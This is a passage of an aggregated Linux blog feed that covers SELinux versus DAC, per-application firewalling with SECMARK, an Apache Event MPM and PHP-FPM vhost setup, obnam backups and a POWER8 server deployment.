However, this definitely is partially implemented because there are quite a few restrictions. One of them is that, if a request is made towards a resource and the UIDs match (see page 3, figure 2 of the paper) then the LSM hook is not consulted. When they don't match, a permissive LSM hook can be implemented. Support for permissive hooks is implemented for capabilities, a powerful DAC control that Linux supports and which is implemented through LSM as well. I have blogged about this nice feature a while ago.

These restrictions are also why some other security-conscious developers, such as grsecurity's team and RSBAC do not use the LSM system. Well, it's not only through these restrictions of course - other reasons play a role in them as well. But knowing what LSM can (and cannot) do also shows what SELinux can and cannot do.

The LSM design itself is already a reason why SELinux cannot substitute DAC controls. But perhaps we could disable DAC completely and thus only rely on SELinux?

Disabling DAC in Linux would be an excessive workload

The discretionary access controls in the Linux kernel are not easy to remove. They are often part of the code itself (just grep through the source code after -EPERM). Some subsystems which use a common standard approach (such as VFS operations) can rely on good integrated security controls, but these too often allow the operation if DAC allows it, and will only consult the LSM hooks otherwise.

VFS operations are the most known ones, but DAC controls go beyond file access. It also entails reading program memory, sending signals to applications, accessing hardware and more. But let's focus on the easier controls (as in, easier to use examples for), such as sharing files between users, restricting access to personal documents and authorizing operations in applications based on the user id (for instance, the owner can modify while other users can only read the file).

We could "work around" the Linux DAC controls by running everything as a single user (the root user) and having all files and resources be fully accessible by this user. But the problem with that is that SELinux would not be able to take over controls either, because you will need some user-based access controls, and within SELinux this implies that a mapping is done from a user to a SELinux user. Also, access controls based on the user id would no longer work, and unless the application is made SELinux-aware it would lack any authorization system (or would need to implement it itself).

With DAC Linux also provides quite some "freedom" which is well established in the Linux (and Unix) environment: a simple security model where the user and group membership versus the owner-privileges, group-privileges and "rest"-privileges are validated. Note that SELinux does not really know what a "group" is. It knows SELinux users, roles, types and sensitivities.

So, suppose we would keep multi-user support in Linux but completely remove the DAC controls and rely solely on LSM (and SELinux). Is this something reusable?

Using SELinux for DAC-alike rules

Consider the use case of two users. One user wants another user to read a few of his files. With DAC controls, he can "open up" the necessary resources (files and directories) through extended access control lists so that the other user can access it. No need to involve administrators.

With a MAC(-only) system, updates on the MAC policy usually require the security administrator to write additional policy rules to allow something. With SELinux (and without DAC) it would require the users to be somewhat isolated from each other (otherwise the users can just access everything from each other), which SELinux can do through User Based Access Control, but the target resource itself should be labeled with a type that is not managed through the UBAC control. Which means that the users will need the privilege to change labels to this type (which is possible!), assuming such a type is already made available for them. Users can't create new types themselves.

UBAC is by default disabled in many distributions, because it has some nasty side-effects that need to be taken into consideration. Just recently one of these came up on the refpolicy mailinglist. But even with UBAC enabled (I have it enabled on most of my systems, but considering that I only have a couple of users to manage and am administrator on these systems to quickly "update" rules when necessary) it does not provide equal functionality as DAC controls.

As mentioned before, SELinux does not know group membership. In order to create something group-like, we will probably need to consider roles. But in SELinux, roles are used to define what types are transitionable towards - it is not a membership approach. A type which is usable by two roles (for instance, the mozilla_t type which is allowed for staff_r and user_r) does not care about the role. This is unlike group membership.

Also, roles only focus on transitionable types (known as domains). It does not care about accessible resources (regular file types for instance). In order to allow one person to read a certain file type but not another, SELinux will need to control that one person can read this file through a particular domain while the other user can't. And given that domains are part of the SELinux policy, any situation that the policy has not thought about before will not be easily adaptable.

So, we can't do it?

Well, I'm pretty sure that a very extensive policy and set of rules can be made for SELinux which would make a number of DAC permissions obsolete, and that we could theoretically remove DAC from the Linux kernel.

End users would require a huge training to work with this system, and it would not be reusable across other systems in different environments, because the policy will be too specific to the system (unlike the current reference policy based ones, which are quite reusable across many distributions).

Furthermore, the effort to create these policies would be extremely high, whereas the DAC permissions are very simple to implement, and have been proven to be well suitable for many secured systems.

So no, unless you do massive engineering, I do not believe it is possible to substitute DAC with SELinux-only controls.

August 07, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Filtering network access per application (August 07, 2015, 01:49 UTC)

Iptables (and the successor nftables) is a powerful packet filtering system in the Linux kernel, able to create advanced firewall capabilities. One of the features that it cannot provide is per-application filtering. Together with SELinux however, it is possible to implement this on a per domain basis.

SELinux does not know applications, but it knows domains. If we ensure that each application runs in its own domain, then we can leverage the firewall capabilities with SELinux to only allow those domains access that we need.

SELinux network control: packet types

The basic network control we need to enable is SELinux' packet types. Most default policies will grant application domains the right set of packet types:

~# sesearch -s mozilla_t -c packet -A
Found 13 semantic av rules:
   allow mozilla_t ipp_client_packet_t : packet { send recv } ; 
   allow mozilla_t soundd_client_packet_t : packet { send recv } ; 
   allow nsswitch_domain dns_client_packet_t : packet { send recv } ; 
   allow mozilla_t speech_client_packet_t : packet { send recv } ; 
   allow mozilla_t ftp_client_packet_t : packet { send recv } ; 
   allow mozilla_t http_client_packet_t : packet { send recv } ; 
   allow mozilla_t tor_client_packet_t : packet { send recv } ; 
   allow mozilla_t squid_client_packet_t : packet { send recv } ; 
   allow mozilla_t http_cache_client_packet_t : packet { send recv } ; 
 DT allow mozilla_t server_packet_type : packet recv ; [ mozilla_bind_all_unreserved_ports ]
 DT allow mozilla_t server_packet_type : packet send ; [ mozilla_bind_all_unreserved_ports ]
 DT allow nsswitch_domain ldap_client_packet_t : packet recv ; [ authlogin_nsswitch_use_ldap ]
 DT allow nsswitch_domain ldap_client_packet_t : packet send ; [ authlogin_nsswitch_use_ldap ]

As we can see, the mozilla_t domain is able to send and receive packets of type ipp_client_packet_t, soundd_client_packet_t, dns_client_packet_t, speech_client_packet_t, ftp_client_packet_t, http_client_packet_t, tor_client_packet_t, squid_client_packet_t and http_cache_client_packet_t. If the SELinux booleans mentioned at the end are enabled, additional packet types are alloed to be used as well.

But even with this default policy in place, SELinux is not being consulted for filtering. To accomplish this, iptables will need to be told to label the incoming and outgoing packets. This is the SECMARK functionality that I've blogged about earlier.

Enabling SECMARK filtering through iptables

To enable SECMARK filtering, we use the iptables command and tell it to label SSH incoming and outgoing packets as ssh_server_packet_t:

~# iptables -t mangle -A INPUT -m state --state ESTABLISHED,RELATED -j CONNSECMARK --restore
~# iptables -t mangle -A INPUT -p tcp --dport 22 -j SECMARK --selctx system_u:object_r:ssh_server_packet_t:s0
~# iptables -t mangle -A OUTPUT -m state --state ESTABLISHED,RELATED -j CONNSECMARK --restore
~# iptables -t mangle -A OUTPUT -p tcp --sport 22 -j SECMARK --selctx system_u:object_r:ssh_server_packet_t:s0

But be warned: the moment iptables starts with its SECMARK support, all packets will be labeled. Those that are not explicitly labeled through one of the above commands will be labeled with the unlabeled_t type, and most domains are not allowed any access to unlabeled_t.

There are two things we can do to improve this situation:

  1. Define the necessary SECMARK rules for all supported ports (which is something that secmarkgen does), and/or
  2. Allow unlabeled_t for all domains.

To allow the latter, we can load a SELinux rule like the following:

(allow domain unlabeled_t (packet (send recv)))

This will allow all domains to send and receive packets of the unlabeled_t type. Although this is something that might be security-sensitive, it might be a good idea to allow at start, together with proper auditing (you can use (auditallow ...) to audit all granted packet communication) so that the right set of packet types can be enabled. This way, administrators can iteratively improve the SECMARK rules and finally remove the unlabeled_t privilege from the domain attribute.

To list the current SECMARK rules, list the firewall rules for the mangle table:

~# iptables -t mangle -nvL

Only granting one application network access

These two together allow for creating a firewall that only allows a single domain access to a particular target.

For instance, suppose that we only want the mozilla_t domain to connect to the company proxy ( We can't enable the http_client_packet_t for this connection, as all other web browsers and other HTTP-aware applications will have policy rules enabled to send and receive that packet type. Instead, we are going to create a new packet type to use.

;; Definition of myhttp_client_packet_t
(type myhttp_client_packet_t)
(roletype object_r myhttp_client_packet_t)
(typeattributeset client_packet_type (myhttp_client_packet_t))
(typeattributeset packet_type (myhttp_client_packet_t))

;; Grant the use to mozilla_t
(typeattributeset cil_gen_require mozilla_t)
(allow mozilla_t myhttp_client_packet_t (packet (send recv)))

Putting the above in a myhttppacket.cil file and loading it allows the type to be used:

~# semodule -i myhttppacket.cil

Now, the myhttp_client_packet_t type can be used in iptables rules. Also, only the mozilla_t domain is allowed to send and receive these packets, effectively creating an application-based firewall, as all we now need to do is to mark the outgoing packets towards the proxy as myhttp_client_packet_t:

~# iptables -t mangle -A OUTPUT -p tcp --dport 80 -d -j SECMARK --selctx system_u:object_r:myhttp_client_packet_t:s0

This shows that it is possible to create such firewall rules with SELinux. It is however not an out-of-the-box solution, requiring thought and development of both firewall rules and SELinux code constructions. Still, with some advanced scripting experience this will lead to a powerful addition to a hardened system.

Nathan Zachary a.k.a. nathanzachary (homepage, bugs)


My tech articles—especially Linux ones—are some of the most-viewed on The Z-Issue. If this one has helped you, please consider a small donation to The Parker Fund by using the top widget at the right. Thanks!

Recently, I’ve spent a huge amount of time working on Apache and PHP-FPM in order to allow for a threaded Apache MPM whilst still using PHP and virtual hosts (vhosts). As this article is going to be rather lengthy, I’m going to split it up into sections below. It’s my hope that after reading the article, you’ll be able to take advantage of Apache’s newer Event MPM and mod_proxy_fcgi in order to get the best performance out of your web server.

1. Definitions:

Before delving into the overarching problem, it might be best to have some definitions in place. If you’re new to the whole idea of web servers, programming languages used for web sites, and such, these definitions may help you become more acquainted with the problem that this article addresses. If you’re familiar with things like Apache, PHP, threading, preforking, and so on, feel free to skip this basic section.

  • Web server – on a physical server, the web server is an application that actually hands out (or serves) web pages to clients as they request them from their browser. Apache and nginx are two popular web servers in the Linux / UNIX world.
  • Apache MPM – a multi-processing module (or MPM) is the pluggable mechanism by which Apache binds to network ports on a server, processes incoming requests for web sites, and creates children to handle each request.
    • Prefork – the older Apache MPM that isn’t threaded, and deals with each request by creating a completely separate Apache process. It is needed for programming languages and libraries that don’t deal well with threading (like some PHP modules).
    • Event – a newer Apache MPM that is threaded, which allows Apache to handle more requests at a time by passing off some of the work to threads, so that the master process can work on other things.
  • Virtual host (vhost) – a method of deploying multiple websites on the same physical server via the same web server application. Basically, you could have and both on the same server, and even using the same IP address.
  • PHP – PHP is arguably one of the most common programming languages used for website creation. Many web content management systems (like WordPress, Joomla!, and MediaWiki) are written in PHP.
  • mod_php – An Apache module for processing PHP. With this module, the PHP interpreter is essentially embedded within the Apache application. It is typically used with the Prefork MPM.
  • mod_proxy_fcgi – An Apache module that allows for passing off operations to a FastCGI processor (PHP can be interpreted this way via PHP-FPM).
  • PHP-FPM – Stands for PHP FastCGI Process Manager, and is exactly what it sounds like: a manager for PHP that’s being interpreted via FastCGI. Unlike mod_php, this means that PHP is being interpreted by FastCGI, and not directly within the Apache application.
  • UNIX socket – a mechanism that allows two processes within the same UNIX/Linux operating system to communicate with one another.

Defining threads versus processes in detail is beyond the scope of this article, but basically, a thread is much smaller and less resource-intense than a process. There are many benefits to using threads instead of full processes for smaller tasks.

2. Introduction:

Okay, so now that we have a few operational definitions in place, let’s get to the underlying problem that this article addresses. When running one or more busy websites on a server, it’s desirable to reduce the amount of processing power and memory that is needed to serve those sites. Doing so will, consequently, allow the sites to be served more efficiently, rapidly, and to more simultaneous clients. One great way to do that is to switch from the Prefork MPM to the new Event MPM in Apache 2.4. However, that requires getting rid of mod_php and switching to a PHP-FPM backend proxied via mod_proxy_fcgi. All that sounds fine and dandy, except that there have been several problems with it in the past (such as .htaccess files not being honoured, effectively passing the processed PHP file back to Apache, and making the whole system work with virtual hosts [vhosts]). Later, I will show you a method that addresses these problems, but beforehand, it might help to see some diagrams that outline these two different MPMs and their respective connections to PHP process.

The de facto way to use PHP and Apache has been with the embedded PHP processor via mod_php:

Apache Prefork MPM with mod_php embedded
Apache with the Prefork MPM and embedded mod_php
Click to enlarge


This new method involves proxying the PHP processing to PHP-FPM:

Apache Event MPM to PHP-FPM via mod_proxy_fcgi
Apache with the Event MPM offloading to PHP-FPM via mod_proxy_fcgi
Click to enlarge

3. The Setup:

On the majority of my servers, I use Gentoo Linux, and as such, the exact file locations or methods for each task may be different on your server(s). Despite the distro-specific differences, though, the overall configuration should be mostly the same.

3a. OS and Linux kernel:

Before jumping into the package rebuilds needed to swap Apache to the Event MPM and to use PHP-FPM, a few OS/kernel-related items should be confirmed or modified: 1) epoll support, 2) the maximum number of open file descriptors, and 3) the number of backlogged sockets.

Epoll support
The Apache Event MPM and PHP-FPM can use several different event mechanisms, but on a Linux system, it is advisable to use epoll. Even though epoll has been the default since the 2.6 branch of the Linux kernel, you should still confirm that it is available on your system. That can be done with two commands (one for kernel support, and one for glibc support):

Kernel support for epoll (replace /usr/src/linux/.config with the actual location of your kernel config):
# grep -i epoll /usr/src/linux/.config

glibc support for epoll
# nm -D /lib/ | grep -i epoll
00000000000e7dc0 T epoll_create
00000000000e7df0 T epoll_create1
00000000000e7e20 T epoll_ctl
00000000000e7a40 T epoll_pwait
00000000000e7e50 T epoll_wait

Max open file descriptors
Another aspect you will need to tune based on your specific needs is the maximum number of open file descriptors. Basically, since there will be files opened for the Apache connections, the UNIX socket to PHP-FPM, and for the PHP-FPM processes themselves, it is a good idea to have a high maximum number of open files. You can check the current kernel-imposed limit by using the following command:

# cat /proc/sys/fs/file-max

Though that number is usually very high, you also need to check the limits based on user. For sake of ease, and seeing as servers running many vhosts may frequently add and modify user accounts, I generally set the max file descriptors pretty high for *all* users.

# grep nofile /etc/security/limits.conf
# - nofile - max number of open file descriptors
* soft nofile 16384
* hard nofile 16384

The specifics of modifying the limits.conf file are outside of the scope of this article, but the above changes will set the soft and hard limits to 16,384 open files for any user on the system.

Backlogged socket connections
The last OS configuration that you might want to initially configure is the maximum number of backlogged socket connections. This number is important because we will be proxying Apache to PHP-FPM via UNIX sockets, and this value sets the maximum number of connections per socket. It should be noted that this is the maximum number per socket, so setting this kernel parameter to some outlandish value doesn’t really make a lot of sense. As you will see later in this tutorial, I create a socket for each virtual host, so unless you plan on having more than 1024 simultaneous connections to PHP-FPM per site, this value is sufficient. You can change it permanently in /etc/sysctl.conf:

# grep somaxconn /etc/sysctl.conf
net.core.somaxconn = 1024

and remember to run sysctl -p thereafter in order to make the changes active.

3b. Package rebuilds:

Now that you’ve checked (and possibly modified) some OS-related configurations, a few packages needed to be recompiled in order to change from the Apache Prefork MPM to the Event MPM and to use PHP-FPM. Here’s a list of the changes that I needed to make:

  • In /etc/portage/make.conf
    • Change the MPM to read APACHE2_MPMS="event"
    • Ensure you have at least the following APACHE2_MODULES enabled: cgid proxy proxy_fcgi
    • Per the mod_cgid documentation you should enable mod_cgid and disable mod_cgi when using the Event MPM
  • In /etc/portage/package.use
    • Apache: www-servers/apache threads
    • PHP must include at least: dev-lang/php cgi fpm threads
      • Note that you do not need to have the ‘apache2′ USE flag enabled for PHP since you’re not using Apache’s PHP module
      • However, you will still need to have the MIME types and the DirectoryIndex directives set (see subsection 3d below)
    • Eselect for PHP must have: app-eselect/eselect-php fpm

Now that those changes have been made, and you’ve recompiled the appropriate packages (Apache, and PHP), it’s time to start configuring the packages before reloading them. In Gentoo, these changes won’t take effect until you restart the running instances. For me, that meant that I could compile everything ahead of time, and then make the configuration changes listed in the remaining 3.x subsections before restarting. That procedure allowed for very little downtime!

3c. Apache:

Within the configurations for the main Apache application, there are several changes that need to be made due to switching to a threaded version with the Event MPM. The first three bullet points for httpd.conf listed below relate to the proxy modules, and the fourth bullet point relates to the directives specific to the Event MPM. For more information about the MPM directives, see Apache’s documentation.

  • In /etc/apache2/httpd.conf
    • The proxy and proxy_fcgi modules need to be loaded:
      LoadModule proxy_module modules/
      LoadModule proxy_fcgi_module modules/
    • Comment out LoadModule cgi_module modules/ so it does not get loaded
    • Replace that with the one for mod_cgid: LoadModule cgid_module modules/
    • Update the MPM portion for Event:
      • <IfModule event.c>
        StartServers 2
        ServerLimit 16
        MinSpareThreads 75
        MaxSpareThreads 250
        ThreadsPerChild 25
        MaxRequestWorkers 400
        MaxConnectionsPerChild 10000

You will also need to make sure that Apache loads certain modules at runtime. In Gentoo, that configuration is done in /etc/conf.d/apache, and needs to contain at least the two modules listed below (note that your configuration will likely have other modules loaded as well):

  • In /etc/conf.d/apache

3d. Apache PHP module:

The last change that needs to be made for Apache is to the configuration file for how it handles PHP processing (in Gentoo, this configuration is found in /etc/apache2/modules.d/70_mod_php5.conf. I would suggest making a backup of the existing file, and making changes to a copy so that it can be easily reverted, if necessary.

70_mod_php5.conf BEFORE changes
<IfDefine PHP5>
  <IfModule !mod_php5.c>
    LoadModule php5_module modules/
  <FilesMatch "\.(php|php5|phtml)$">
    SetHandler application/x-httpd-php
  <FilesMatch "\.phps$">
    SetHandler application/x-httpd-php-source

  DirectoryIndex index.php index.phtml

70_mod_php5.conf AFTER changes
<IfDefine PHP5>
  ## Define FilesMatch in each vhost
  <IfModule mod_mime.c>
    AddHandler application/x-httpd-php .php .php5 .phtml
    AddHandler application/x-httpd-php-source .phps

  DirectoryIndex index.php index.phtml

Basically, you’re getting rid of the LoadModule reference for mod_php, and all the FileMatch directives. Now, if you’re not using virtual hosts, you can put the FilesMatch and Proxy directives from the vhosts section (3e) below in your main PHP module configuration. That being said, the point of this article is to set up everything for use with vhosts, and as such, the module should look like the example immediately above.

As mentioned in section 3b above, the reason you still need the 70_mod_php5.conf at all is so that you can definite the MIME types for PHP and the DirectoryIndex. If you would rather not have this file present, (since you’re not really using mod_php), you can just place these directives (the AddHandler and DirectoryIndex ones) in your main Apache configuration—your choice.

3e. vhosts:

For each vhost, I would recommend creating a user and corresponding group. How you manage local users and groups on your server is beyond the scope of this document. For this example, though, we’re going to have and (very creative, I know 😎 ). To keep it simple, the corresponding users will be ‘site1′ and ‘site2′, respectively. For each site, you will have a separate vhost configuration (and again, how you manage your vhosts is beyond the scope of this document). Within each vhost, the big change that you need to make is to add the FilesMatch and Proxy directives. Here’s the generic template for the vhost configuration additions:

Generic template for vhost configs
<FilesMatch "\.php$">
  SetHandler "proxy:unix:///var/run/php-fpm/$pool.sock|fcgi://$pool/"

<Proxy fcgi://$pool/ enablereuse=on max=10>

In that template, you will replace $pool with the name of each PHP-FPM pool, which will be explained in the next subsection (3f). In my opinion, it is easiest to keep the name of the pool the same as the user assigned to each site, but you’re free to change those naming conventions so that they make sense to you. Based on my / example, the vhost configuration additions would be: vhost config
<FilesMatch "\.php$">
  SetHandler "proxy:unix:///var/run/php-fpm/site1.sock|fcgi://site1/"

<Proxy fcgi://site1/ enablereuse=on max=10>
</Proxy> vhost config
<FilesMatch "\.php$">
  SetHandler "proxy:unix:///var/run/php-fpm/site2.sock|fcgi://site2/"

<Proxy fcgi://site2/ enablereuse=on max=10>

3f. PHP-FPM:

Since you re-compiled PHP with FPM support (in step 3b), you need to actually start the new process with /etc/init.d/php-fpm start and add it to the default runlevel so that it starts automatically when the server boots (note that this command varies based on your init system):

rc-update add php-fpm default (Gentoo with OpenRC)

Now it’s time to actually configure PHP-FPM via the php-fpm.conf file, which, in Gentoo, is located at /etc/php/fpm-php$VERSION/php-fpm.conf. There are two sections to this configuration file: 1) global directives, which apply to all PHP-FPM instances, and 2) pool directives, which can be changed for each pool (e.g. each vhost). For various non-mandatory options, please see the full list of PHP-FPM directives.

At the top of php-fpm.conf are the global directives, which are:
error_log = /var/log/php-fpm.log
events.mechanism = epoll
emergency_restart_threshold = 0

These directives should be fairly self-explanatory, but here’s a quick summary:

  • [global] – The intro block stating that the following directives are global and not pool-specific
  • error_log – The file to which PHP-FPM will log errors and other notices
  • events.mechanism – What should PHP-FPM use to process events (relates to the epoll portion in subsection 3a)
  • emergency_restart_threshold – How many PHP-FPM children must die improperly before it automatically restarts (0 means the threshold is disabled)

Thereafter are the pool directives, for which I follow this template, with one pool for each vhost:
listen = /var/run/php-fpm/$USER.sock
listen.owner = $USER = apache
listen.mode = 0660
user = $USER
group = apache
pm = dynamic
pm.start_servers = 3
pm.max_children = 100
pm.min_spare_servers = 2
pm.max_spare_servers = 5
pm.max_requests = 10000
request_terminate_timeout = 300

It may look a bit intimidating at first, but only the $SITE, $TLD, and $USER variables change based on your vhosts and corresponding users. When the template is used for the / example, the pools look like:

listen = /var/run/php-fpm/site1.sock
listen.owner = site1 = apache
listen.mode = 0660
user = site1
group = apache
pm = dynamic
pm.start_servers = 3
pm.max_children = 100
pm.min_spare_servers = 2
pm.max_spare_servers = 5
pm.max_requests = 10000
request_terminate_timeout = 300

listen = /var/run/php-fpm/site2.sock
listen.owner = site2 = apache
listen.mode = 0660
user = site2
group = apache
pm = dynamic
pm.start_servers = 3
pm.max_children = 100
pm.min_spare_servers = 2
pm.max_spare_servers = 5
pm.max_requests = 10000
request_terminate_timeout = 300

Since the UNIX sockets are created in /var/run/php-fpm/, you need to make sure that that directory exists and is owned by root. The listen.owner and directives will make the actual UNIX socket for the pool owned by $USER:apache, and will make sure that the apache group can write to it (which is necessary).

The following directives are ones that you will want to change based on site traffic and server resources:

  • pm.start_servers – The number of PHP-FPM children that should be spawned automatically
  • pm.max_children – The maximum number of children allowed (connection limit)
  • pm.min_spare_servers – The minimum number of spare idle PHP-FPM servers to have available
  • pm.max_spare_servers – The maximum number of spare idle PHP-FPM servers to have available
  • pm.max_requests – Maximum number of requests each child should handle before re-spawning
  • pm.request_terminate_timeout – Maximum amount of time to process a request (similar to max_execution_time in php.ini

These directives should all be adjusted based on the needs of each site. For instance, a really busy site with many, many, simultaneous PHP connections may need 3 servers each with 100 children, whilst a low-traffic site may only only need 1 server with 10 children. The thing to remember is that those children are only active whilst actually processing PHP, which could be a very short amount of time (possibly measured in milliseconds). Contrapositively, setting the numbers too high for the server to handle (in terms of available memory and processor) will result in poor performance when sites are under load. As with anything, tuning the pool requirements will take time and analysis to get it right.

Remember to reload (or restart) PHP-FPM after making any changes to its configuration (global or pool-based):

/etc/init.d/php-fpm reload

4. Verification:

After you have configured Apache, your vhosts, PHP, PHP-FPM, and the other components mentioned throughout this article, you will need to restart them all (just for sake of cleanness). To verify that things are as they should be, you can simply browse to one of the sites configured in your vhosts and make sure that it functions as intended. You can also verify some of the individual components with the following commands:

Apache supports threads, and is using the Event MPM
# apache2 -V | grep 'Server MPM\|threaded'
Server MPM:     event
  threaded:     yes (fixed thread count)

Apache / vhost syntax
# apache2ctl configtest
 * Checking apache2 configuration ...     [ ok ]

5. Troubleshooting:

So you followed the directions here, and it didn’t go flawlessly?! Hark! 😮 In all seriousness, there are several potential points of failure for setting up Apache to communicate with PHP-FPM via mod_proxy_fcgi, but fortunately, there are some methods for troubleshooting (one of the beauties of Linux and other UNIX derivatives is logging).

By default, mod_proxy and mod_proxy_fcgi will report errors to the log that you have specified via the ErrorLog directive, either in your overall Apache configuration, or within each vhost. Those logs serve as a good starting point for tracking down problems. For instance, before I had appropriately set the UNIX socket permission options in php-fpm.conf, I noticed these errors:

[Wed Jul 08 00:03:26.717538 2015] [proxy:error] [pid 2582:tid 140159555143424] (13)Permission denied: AH02454: FCGI: attempt to connect to Unix domain socket /var/run/php-fpm/site1.sock (*) failed
[Wed Jul 08 00:03:26.717548 2015] [proxy_fcgi:error] [pid 2582:tid 140159555143424] [client 52350] AH01079: failed to make connection to backend: httpd-UDS

That error in bold text indicated that Apache didn’t have permission to write to the UNIX socket. Setting the permissions accordingly—see the listen.owner and directives portion of subsection 3f—fixed the problem.

Say that the errors don’t provide detailed enough information, though. You can set the LogLevel directive (again, either in your overall Apache configuration, or per vhost) to substantially increase the verbosity—to debug or even trace levels. You can even change the log level just for certain modules, so that you don’t get bogged down with information that is irrelevant to your particular error. For instance:

LogLevel warn proxy:debug proxy_fcgi:debug

will set the overall LogLevel to “warn,” but the LogLevel for mod_proxy and mod_proxy_fcgi to “debug,” in order to make them more verbose.

6. Conclusion:

If you’ve stuck with me throughout this gigantic post, you’re either really interested in systems engineering and the web stack, or you may have some borderline masochistic tendencies. 😛 I hope that you have found the article helpful in setting up PHP to proxy PHP interpretation to PHP-FPM via mod_proxy_fcgi, and that you’re able to see the benefits of this type of offloading. Not only does this method of processing PHP files free up resources so that Apache can serve more simultaneous connections with fewer resources, but it also more closely adheres to the UNIX philosophy of having applications perform only one task, and do so in the best way possible.

If you have any questions, comments, concerns, or suggestions, please feel free to leave a comment.


August 05, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
My application base: Obnam (August 05, 2015, 20:35 UTC)

It is often said, yet too often forgotten: taking backups (and verifying that they work). Taking backups is not purely for companies and organizations. Individuals should also take backups to ensure that, in case of errors or calamities, the all important files are readily recoverable.

For backing up files and directories, I personally use obnam, after playing around with Bacula and attic. Bacula is more meant for large distributed environments (although I also tend to use obnam for my server infrastructure) and was too complex for my taste. The choice between obnam and attic is even more personally-oriented.

I found attic to be faster, but with a small supporting community. Obnam was slower, but seems to have a more active community which I find important for infrastructure that is meant to live quite long (you don't want to switch backup solutions every year). I also found it pretty easy to work with, and to restore files back, and Gentoo provides the app-backup/obnam package.

I think both are decent solutions, so I had to make one choice and ended up with obnam. So, how does it work?

Configuring what to backup

The basic configuration file for obnam is /etc/obnam.conf. Inside this file, I tell which directories need to be backed up, as well as which subdirectories or files (through expressions) can be left alone. For instance, I don't want obnam to backup ISO files as those have been downloaded anyway.

repository = /srv/backup
root = /root, /etc, /var/lib/portage, /srv/virt/gentoo, /home
exclude = \.img$, \.iso$, /home/[^/]*/Development/Centralized/.*
exclude-caches = yes

keep = 8h,14d,10w,12m,10y

The root parameter tells obnam which directories (and subdirectories) to back up. With exclude a particular set of files or directories can be excluded, for instance because these contain downloaded resources (and as such do not need to be inside the backup archives).

Obnam also supports the CACHEDIR.TAG specification, which I use for the various cache directories. With the use of these cache tag files I do not need to update the obnam.conf file with every new cache directory (or software build directory).

The last parameter in the configuration that I want to focus on is the keep parameter. Every time obnam takes a backup, it creates what it calls a new generation. When the backup storage becomes too big, administrators can run obnam forget to drop generations. The keep parameter informs obnam which generations can be removed and which ones can be kept.

In my case, I want to keep one backup per hour for the last 8 hours (I normally take one backup per day, but during some development sprees or photo manipulations I back up multiple times), one per day for the last two weeks, one per week for the last 10 weeks, one per month for the last 12 months and one per year for the last 10 years.

Obnam will clean up only when obnam forget is executed. As storage is cheap, and the performance of obnam is sufficient for me, I do not need to call this very often.

Backing up and restoring files

My backup strategy is to backup to an external disk, and then synchronize this disk with a personal backup server somewhere else. This backup server runs no other software beyond OpenSSH (to allow secure transfer of the backups) and both the backup server disks and the external disk is LUKS encrypted. Considering that I don't have government secrets I opted not to encrypt the backup files themselves, but Obnam does support that (through GnuPG).

All backup enabled systems use cron jobs which execute obnam backup to take the backup, and use rsync to synchronize the finished backup with the backup server. If I need to restore a file, I use obnam ls to see which file(s) I need to restore (add in a --generation= to list the files of a different backup generation than the last one).

Then, the command to restore is:

~# obnam restore --to=/var/restore /home/swift/Images/Processing/*.NCF

Or I can restore immediately to the directory again:

~# obnam restore --to=/home/swift/Images/Processing /home/swift/Images/Processing/*.NCF

To support multiple clients, obnam by default identifies each client through the hostname. It is possible to use different names, but hostnames tend to be a common best practice which I don't deviate from either. Obnam is able to share blocks between clients (it is not mandatory, but supported nonetheless).

August 04, 2015
Lance Albertson a.k.a. ramereth (homepage, bugs)
Leveling up with POWER8 (August 04, 2015, 20:37 UTC)

Over the past year I've had the privilege of working on a new POWER architecture ppc64le (PowerPC 64bit Little Endian). We've had a long relationship with IBM at the Open Source Lab (OSL) providing resources for the POWER architecture to FOSS projects.

Earlier this year, IBM graciously donated three powerful POWER8 machines to the OSL to replace our aging FTP cluster. This produced a few challenges we needed to overcome to make this work:

  • We're primarily an x86 shop, so we needed to get used to the POWER8 platform in a production environment
  • This platform is extremely new, so we're on the leading edge using this hardware in a production environment
  • It was recommended to use the new ppc64le architecture by the IBM engineers, which was still getting support from RedHat at the time
  • There was no CentOS ppc64le build yet and RHEL 7 wasn't quite officially supported yet (however, it was added in 7.1)
  • This platform uses a different boot process than other machines, namely the OPAL firmware which uses the Petitboot boot loader

POWER8 architecture differences

We've been using IBM POWER7 hardware for many years which requires the use of a proprietary management system called the Hardware Management Console (HMC). It was an extremely difficult system to use and was so foreign to how we normally manage systems. So when we got our first POWER8 system, I was delighted to see that they did away with the HMC and provided an abstraction layer called OPAL (also known as skiboot) to manage the system. Basically, it meant these machines actually use open standards and essentially boot like an x86 machine more or less (i.e. what we're more used to).

When you first boot a POWER8 machine that is using OPAL, you use IPMI to connect to the serial console (which needs to be enabled in the FSP). The FSP stands for the Flexible Service Processor which is basically the low level firmware that manages the hardware of the machine. When it first boots up, you'll see a Linux kernel booting up and then a boot prompt running Petitboot. Petitboot is a kexec based boot loader.

This basically allows you to do the following:

  • Auto-boots a kernel
  • Gives you a bash prompt to diagnose the machine or setup hardware RAID
  • Give you a sensible way to install an OS remotely

When it boots an installed system, it'll actually do a kexec and reboot into the actual OS kernel. Overall, it is an easy and simple way to remotely manage a machine.

Operating System Setup

The next major challenge was creating a stable operating system environment. When I first started to test these machines, I was using a beta build of RHEL 7 for ppc64le that contained bugs. Thankfully 7.1 was released recently which provided a much more stable installer and platform in general. Getting the OS installed was the easy part, the more challenging part was getting our normal base system up with Chef. This required manually building a chef client for ppc64le since none existed yet. We ended up building the client using the Omnibus Chef build on a guest which meant we had to bootstrap the build environment some a little too.

The next challenge was installing all of the base packages and packages we needed for running our FTP mirrors. Most of those packages are in EPEL however there is no ppc64le builds (yet) for the architecture. So we needed up having to build many of the dependencies using mock and hosting it in a local repository. Thankfully we didn't require many dependencies, and all of the builds had no compile problems.

Storage layout and configuration

One of the other interesting parts of this was the storage configuration for the servers. These machines came with five 387GB SSDs and ten 1.2TB SAS disks. The hardware RAID controller comes with a feature called RAID6T2 which provides a two tier RAID solution but visible as a single block device. Essentially it uses the SAS disks for the cold storage and the SSDs are for hot cache access and writing.

Being a lover of open source, I was interested in seeing how this performed against other technologies such as bcache. While I don't have all of the numbers still, the hardware RAID out performed bcache by quite a bit. Eventually I'd like to see if there are other tweaks so we aren't reliant on a proprietary RAID controller, but for now the controller is working flawlessly.

Production deployment and results

We successfully deployed all three new POWER8 servers without any issue on June 18, 2015. We're already seeing a large increase in utilization on the new machines as they have far more I/O capacity and throughput than the previous cluster. I've been extremely impressed with how stable and how fast these machines are.

Since we're on the leading edge of using these machines, I'm hoping to write more detailed and technical blog posts on the various steps I went through.

